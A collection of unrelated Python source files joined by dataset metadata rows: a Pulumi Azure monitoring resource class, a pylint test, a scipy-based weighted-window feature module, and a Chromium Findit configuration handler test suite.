condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ActionRuleActionGroupArgs.__new__(ActionRuleActionGroupArgs)
if action_group_id is None and not opts.urn:
raise TypeError("Missing required property 'action_group_id'")
__props__.__dict__["action_group_id"] = action_group_id
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
__props__.__dict__["tags"] = tags
super(ActionRuleActionGroup, __self__).__init__(
'azure:monitoring/actionRuleActionGroup:ActionRuleActionGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
action_group_id: Optional[pulumi.Input[str]] = None,
condition: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
scope: Optional[pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'ActionRuleActionGroup':
"""
Get an existing ActionRuleActionGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] action_group_id: Specifies the resource id of monitor action group.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupConditionArgs']] condition: A `condition` block as defined below.
:param pulumi.Input[str] description: Specifies a description for the Action Rule.
:param pulumi.Input[bool] enabled: Is the Action Rule enabled? Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['ActionRuleActionGroupScopeArgs']] scope: A `scope` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ActionRuleActionGroupState.__new__(_ActionRuleActionGroupState)
__props__.__dict__["action_group_id"] = action_group_id
__props__.__dict__["condition"] = condition
__props__.__dict__["description"] = description
__props__.__dict__["enabled"] = enabled
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["scope"] = scope
__props__.__dict__["tags"] = tags
return ActionRuleActionGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="actionGroupId")
def action_group_id(self) -> pulumi.Output[str]:
"""
Specifies the resource id of monitor action group.
"""
return pulumi.get(self, "action_group_id")
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['outputs.ActionRuleActionGroupCondition']]:
"""
A `condition` block as defined below.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a description for the Action Rule.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Is the Action Rule enabled? Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Monitor Action Rule. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the resource group in which the Monitor Action Rule should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def scope(self) -> pulumi.Output[Optional['outputs.ActionRuleActionGroupScope']]:
"""
A `scope` block as defined below.
"""
return pulumi.get(self, "scope")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 44.443623 | 228 | 0.655257 | 2,680 | 24,044 | 5.686194 | 0.071269 | 0.087342 | 0.061553 | 0.04331 | 0.87427 | 0.85793 | 0.839885 | 0.831223 | 0.827876 | 0.822232 | 0 | 0.003795 | 0.243803 | 24,044 | 540 | 229 | 44.525926 | 0.834342 | 0.344826 | 0 | 0.774744 | 1 | 0 | 0.12373 | 0.055393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16041 | false | 0.003413 | 0.023891 | 0 | 0.279863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d7d3f50d323e899f44dc7d0e927709eabb4896d2 | 158 | py | Python | test/test_code_quality.py | KMC-70/kaos | ac44b78919560fd12cd2759cf9056abc3ee4392b | [
"MIT"
] | 2 | 2019-03-07T15:43:49.000Z | 2019-03-14T06:33:31.000Z | test/test_code_quality.py | KMC-70/kaos | ac44b78919560fd12cd2759cf9056abc3ee4392b | [
"MIT"
] | 22 | 2018-11-07T22:52:57.000Z | 2021-03-20T00:18:31.000Z | test/test_code_quality.py | KMC-70/kaos | ac44b78919560fd12cd2759cf9056abc3ee4392b | [
"MIT"
] | 3 | 2018-10-08T02:03:59.000Z | 2019-04-23T17:28:55.000Z | """Code quality tests for KAOS."""
def test_code_quality():
"""Pylint test."""
from pylint import epylint as lint
assert not lint.py_run("kaos")
| 22.571429 | 38 | 0.664557 | 23 | 158 | 4.434783 | 0.73913 | 0.215686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196203 | 158 | 6 | 39 | 26.333333 | 0.80315 | 0.259494 | 0 | 0 | 0 | 0 | 0.037736 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
f098fc29cff9a39ad8aa19535a116df4a10ccd60 | 8,544 | py | Python | NitroFE/time_based_features/weighted_window_features/weighted_windows.py | NITRO-AI/NitroFE | 08d5ccd2be7da4534bd1fb04b85d7c61ba1c017e | [
"Apache-2.0"
] | 81 | 2021-10-31T12:20:10.000Z | 2022-03-29T22:38:06.000Z | NitroFE/time_based_features/weighted_window_features/weighted_windows.py | adbmd/NitroFE | 327a54ffd5f9aaa19d05d7d87918757e3b0f5712 | [
"Apache-2.0"
] | 1 | 2021-11-02T14:21:48.000Z | 2021-11-02T14:21:48.000Z | NitroFE/time_based_features/weighted_window_features/weighted_windows.py | adbmd/NitroFE | 327a54ffd5f9aaa19d05d7d87918757e3b0f5712 | [
"Apache-2.0"
] | 7 | 2021-11-01T08:17:37.000Z | 2022-01-01T19:06:06.000Z | from scipy import signal
import numpy as np
def _weighted_window_operation(data,
window_size,
window_function_values,
resize=True):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
else:
window_function_values=window_function_values[:len(data)]
return np.multiply(window_function_values, data)
def _barthann_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.barthann(window_size, sym=symmetric)
else:
window_function_values=signal.windows.barthann(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _weighted_moving_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=np.arange(1,window_size+1)/np.arange(1,window_size+1).sum()
else:
window_function_values=np.arange(1,len(data)+1)/np.arange(1,len(data)+1).sum()
return np.multiply(window_function_values, data)
def _bartlett_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.bartlett(window_size, sym=symmetric)
else:
window_function_values=signal.windows.bartlett(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _blackman_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.blackman(window_size, sym=symmetric)
else:
window_function_values=signal.windows.blackman(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _blackmanharris_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.blackmanharris(window_size, sym=symmetric)
else:
window_function_values=signal.windows.blackmanharris(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _bohman_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.bohman(window_size, sym=symmetric)
else:
window_function_values=signal.windows.bohman(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _cosine_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.cosine(window_size, sym=symmetric)
else:
window_function_values=signal.windows.cosine(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _exponential_window(data,
window_size,
center,
tau,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.exponential(window_size, center=center,
tau=tau, sym=symmetric)
else:
window_function_values=signal.windows.exponential(len(data), center=center,
tau=tau, sym=symmetric)
return np.multiply(window_function_values, data)
def _flattop_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.flattop(window_size, sym=symmetric)
else:
window_function_values=signal.windows.flattop(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _gaussian_window(data,
window_size,
std,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.gaussian(window_size, std=std,sym=symmetric)
else:
window_function_values=signal.windows.gaussian(len(data), std=std,sym=symmetric)
return np.multiply(window_function_values, data)
def _hamming_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.hamming(window_size, sym=symmetric)
else:
window_function_values=signal.windows.hamming(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _hann_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.hamming(window_size, sym=symmetric)
else:
window_function_values=signal.windows.hamming(len(data), sym=symmetric)
return np.multiply(window_function_values, data)
def _kaiser_window(data,
window_size,
beta,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.kaiser(window_size, beta,sym=symmetric)
else:
window_function_values=signal.windows.kaiser(len(data), beta,sym=symmetric)
return np.multiply(window_function_values, data)
def _parzen_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.parzen(window_size,sym=symmetric)
else:
window_function_values=signal.windows.parzen(len(data),sym=symmetric)
return np.multiply(window_function_values, data)
def _triang_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=signal.windows.triang(window_size,sym=symmetric)
else:
window_function_values=signal.windows.triang(len(data),sym=symmetric)
return np.multiply(window_function_values, data)
def _equal_window(data,
window_size,
symmetric,
resize=False):
if (len(data) < window_size)&(resize):
data = np.concatenate((np.zeros(window_size-len(data)), data))
window_function_values=np.ones(window_size)
else:
window_function_values=np.ones(len(data))
return np.multiply(window_function_values, data)
def _identity_window(data,
window_size,
symmetric,
resize=False):
return data
| 38.660633 | 91 | 0.602762 | 936 | 8,544 | 5.276709 | 0.056624 | 0.139704 | 0.210569 | 0.147398 | 0.907876 | 0.900182 | 0.836202 | 0.828103 | 0.789634 | 0.789634 | 0 | 0.001327 | 0.294593 | 8,544 | 220 | 92 | 38.836364 | 0.818152 | 0 | 0 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098901 | false | 0 | 0.010989 | 0.005495 | 0.208791 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f0cbcdee7e0b8f614715551fe2febb68f668f1b7 | 38,395 | py | Python | appengine/findit/handlers/test/config_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/handlers/test/config_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/handlers/test/config_test.py | mithro/chromium-infra | d27ac0b230bedae4bc968515b02927cf9e17c2b7 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import json
import re
import webapp2
import webtest
from handlers import config
from model import wf_config
from testing_utils import testing
from google.appengine.api import users
_MOCK_STEPS_FOR_MASTERS_RULES_OLD_FORMAT = {
'master1': ['unsupported_step1', 'unsupported_step2'],
'master2': ['unsupported_step3', 'unsupported_step4'],
}
_MOCK_STEPS_FOR_MASTERS_RULES = {
'supported_masters': {
'master1': {
# supported_steps override global.
'supported_steps': ['step6'],
'unsupported_steps': ['step1', 'step2', 'step3'],
'check_global': True
},
'master2': {
# Only supports step4 and step5 regardless of global.
'supported_steps': ['step4', 'step5'],
'check_global': False
},
'master3': {
# Supports everything not blacklisted in global.
'check_global': True
},
},
'global': {
# Blacklists all listed steps for all masters unless overridden.
'unsupported_steps': ['step6', 'step7'],
}
}
_MOCK_BUILDERS_TO_TRYBOTS = {
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'flake_trybot': 'trybot1_flake'
}
}
}
_MOCK_TRY_JOB_SETTINGS = {
'server_query_interval_seconds': 60,
'job_timeout_hours': 5,
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 1
}
_MOCK_SWARMING_SETTINGS = {
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 5 * 60, # 5 minutes.
'get_swarming_task_id_wait_seconds': 10,
'server_retry_timeout_hours': 2,
'maximum_server_contact_retry_interval_seconds': 5 * 60, # 5 minutes.
'should_retry_server': False, # No retry for unit testing.
}
_MOCK_DOWNLOAD_BUILD_DATA_SETTINGS = {
'download_interval_seconds': 10,
'memcache_master_download_expiration_seconds': 3600,
'use_chrome_build_extract': True
}
_MOCK_ACTION_SETTINGS = {
'cr_notification_build_threshold': 2,
'cr_notification_latency_limit_minutes': 1000,
}
_MOCK_CHECK_FLAKE_SETTINGS = {
'swarming_rerun': {
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 4,
'max_stable_in_a_row': 4,
'iterations_to_rerun': 100,
'max_build_numbers_to_look_back': 1000,
'max_dive_in_a_row': 4,
'dive_rate_threshold': 0.4,
'use_nearby_neighbor': True,
},
'try_job_rerun': {
'lower_flake_threshold': 0.02,
'upper_flake_threshold': 0.98,
'max_flake_in_a_row': 0,
'max_stable_in_a_row': 0,
'iterations_to_rerun': 100,
},
'update_monorail_bug': True,
'minimum_confidence_score_to_run_tryjobs': 0.6
}
_MOCK_VERSION_NUMBER = 12
class ConfigTest(testing.AppengineTestCase):
app_module = webapp2.WSGIApplication([
('/config', config.Configuration),
], debug=True)
def testGetConfigurationSettings(self):
config_data = {
'steps_for_masters_rules': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS
}
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
wf_config.FinditConfig.Get().Update(users.GetCurrentUser(), True,
**config_data)
response = self.test_app.get('/config', params={'format': 'json'})
self.assertEquals(response.status_int, 200)
expected_response = {
'masters': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS,
'version': 1,
'latest_version': 1,
'updated_by': 'test',
'updated_ts': response.json_body.get('updated_ts')
}
self.assertEquals(expected_response, response.json_body)
def testGetVersionOfConfigurationSettings(self):
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
config_data = {
'steps_for_masters_rules': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS
}
wf_config.FinditConfig.Get().Update(users.GetCurrentUser(), True,
**config_data)
response = self.test_app.get(
'/config', params={'version': 1, 'format': 'json'})
self.assertEquals(response.status_int, 200)
expected_response = {
'masters': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS,
'download_build_data_settings': _MOCK_DOWNLOAD_BUILD_DATA_SETTINGS,
'action_settings': _MOCK_ACTION_SETTINGS,
'check_flake_settings': _MOCK_CHECK_FLAKE_SETTINGS,
'version': 1,
'latest_version': 1,
'updated_by': 'test',
'updated_ts': response.json_body.get('updated_ts')
}
self.assertEquals(expected_response, response.json_body)
def testGetOutOfBoundsVersionOfConfigurationSettings(self):
config_data = {
'steps_for_masters_rules': _MOCK_STEPS_FOR_MASTERS_RULES,
'builders_to_trybots': _MOCK_BUILDERS_TO_TRYBOTS,
'try_job_settings': _MOCK_TRY_JOB_SETTINGS,
'swarming_settings': _MOCK_SWARMING_SETTINGS
}
self.mock_current_user(user_email='test@chromium.org', is_admin=True)
wf_config.FinditConfig.Get().Update(users.GetCurrentUser(), True,
**config_data)
self.assertRaisesRegexp(
webtest.app.AppError,
re.compile('The requested version is invalid or not found.',
re.MULTILINE | re.DOTALL),
self.test_app.get, '/config', params={'version': 0, 'format': 'json'})
self.assertRaisesRegexp(
webtest.app.AppError,
re.compile('The requested version is invalid or not found.',
re.MULTILINE | re.DOTALL),
self.test_app.get, '/config', params={'version': 2, 'format': 'json'})
def testIsListOfType(self):
self.assertFalse(config._IsListOfType({}, basestring))
self.assertFalse(config._IsListOfType([], basestring))
self.assertFalse(config._IsListOfType([1], basestring))
self.assertFalse(config._IsListOfType(['a', 1], basestring))
self.assertTrue(config._IsListOfType(['a', 'b'], basestring))
def testValidateSupportedMastersDict(self):
self.assertFalse(config._ValidateMastersAndStepsRulesMapping(
_MOCK_STEPS_FOR_MASTERS_RULES_OLD_FORMAT))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping(None))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping([]))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': [], # Should be a dict.
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {},
# 'global' is missing.
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {},
'global': [] # Should be a dict.
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
3: {}, # Key should be a string.
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': [], # Value should be a dict.
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'check_global': 1 # Should be a bool.
},
},
'global': {}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {},
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': {}, # Should be a list.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': [], # List should not be empty.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': [1], # List should be of strings.
}
},
'global': {}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': 'blabla', # Should be a list.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': [], # List should not be empty.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': [{}], # List should be of strings.
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': ['step1'], # Should not overlap.
}
},
'global': {}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
}
},
'global': {}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': 1 # Should be a list.
}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': [] # Should not be empty.
}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': [1] # Should be a list of strings.
}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
},
},
'global': {
'unsupported_steps': ['step3']
}
}))
self.assertTrue(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'],
'check_global': True # 'check_global' is optional.
},
},
'global': {
'unsupported_steps': ['step3']
}
}))
self.assertFalse(config._ValidateMastersAndStepsRulesMapping({
'supported_masters': {
'master1': {
'supported_steps': ['step1'],
'unsupported_steps': ['step2'], # Should not be specified.
'check_global': False
},
},
'global': {
'unsupported_steps': ['step3']
}
}))
def testValidatingMastersAndStepRulesRemovesDuplicates(self):
valid_rules_with_duplicates = {
'supported_masters': {
'master1': {
'supported_steps': ['step1', 'step1'],
'unsupported_steps': ['step2', 'step2'],
},
},
'global': {
'unsupported_steps': ['step3', 'step3']
}
}
self.assertTrue(
config._ValidateMastersAndStepsRulesMapping(
valid_rules_with_duplicates))
self.assertEqual(
{
'supported_masters': {
'master1': {
'supported_steps': ['step1', 'step1'],
'unsupported_steps': ['step2', 'step2'],
},
},
'global': {
'unsupported_steps': ['step3', 'step3']
}
},
valid_rules_with_duplicates)
def testValidateTrybotMapping(self):
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
}
}
}))
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'flake_trybot': 'trybot1_flake'
}
}
}))
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'strict_regex': True,
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'strict_regex': 'a',
}
}
}))
self.assertTrue(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'not_run_tests': True,
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'not_run_tests': 1, # Should be a bool.
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': {}, # Should be a string.
'flake_trybot': 'trybot2',
}
}
}))
self.assertFalse(config._ValidateTrybotMapping({
'master1': {
'builder1': {
'mastername': 'tryserver1',
'waterfall_trybot': 'trybot1',
'flake_trybot': 1, # Should be a string.
}
}
}))
self.assertFalse(config._ValidateTrybotMapping(['a']))
self.assertFalse(config._ValidateTrybotMapping({'a': ['b']}))
self.assertFalse(config._ValidateTrybotMapping({'a': {'b': ['1']}}))
self.assertFalse(config._ValidateTrybotMapping({'a': {'b': {}}}))
def testValidateTryJobSettings(self):
self.assertFalse(config._ValidateTryJobSettings([]))
self.assertFalse(config._ValidateTryJobSettings({}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': '1', # Should be an int.
'job_timeout_hours': 1,
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 1
}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': 1,
'job_timeout_hours': '1', # Should be an int.
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 1
}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': 1,
'job_timeout_hours': 1,
'allowed_response_error_times': '1', # Should be an int.
'max_seconds_look_back_for_group': 1
}))
self.assertFalse(config._ValidateTryJobSettings({
'server_query_interval_seconds': 1,
'job_timeout_hours': 1,
'allowed_response_error_times': 1,
'max_seconds_look_back_for_group': 'a' # Should be an int.
}))
self.assertTrue(config._ValidateTryJobSettings(_MOCK_TRY_JOB_SETTINGS))
def testValidateSwarmingSettings(self):
self.assertFalse(config._ValidateSwarmingSettings([]))
self.assertFalse(config._ValidateSwarmingSettings({}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': ['chromium-swarm.appspot.com'], # Should be a string.
'default_request_priority': 150,
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
'get_swarming_task_id_timeout_seconds': 300,
'get_swarming_task_id_wait_seconds': 10
}))
self.assertFalse(config._ValidateSwarmingSettings({
'server_host': 'chromium-swarm.appspot.com',
'default_request_priority': '150', # Should be an int.
'request_expiration_hours': 20,
'server_query_interval_seconds': 60,
'task_timeout_hours': 23,
'isolated_server': 'https://isolateserver.appspot.com',
'isolated_storage_url': 'isolateserver.storage.googleapis.com',
'iterations_to_rerun': 10,
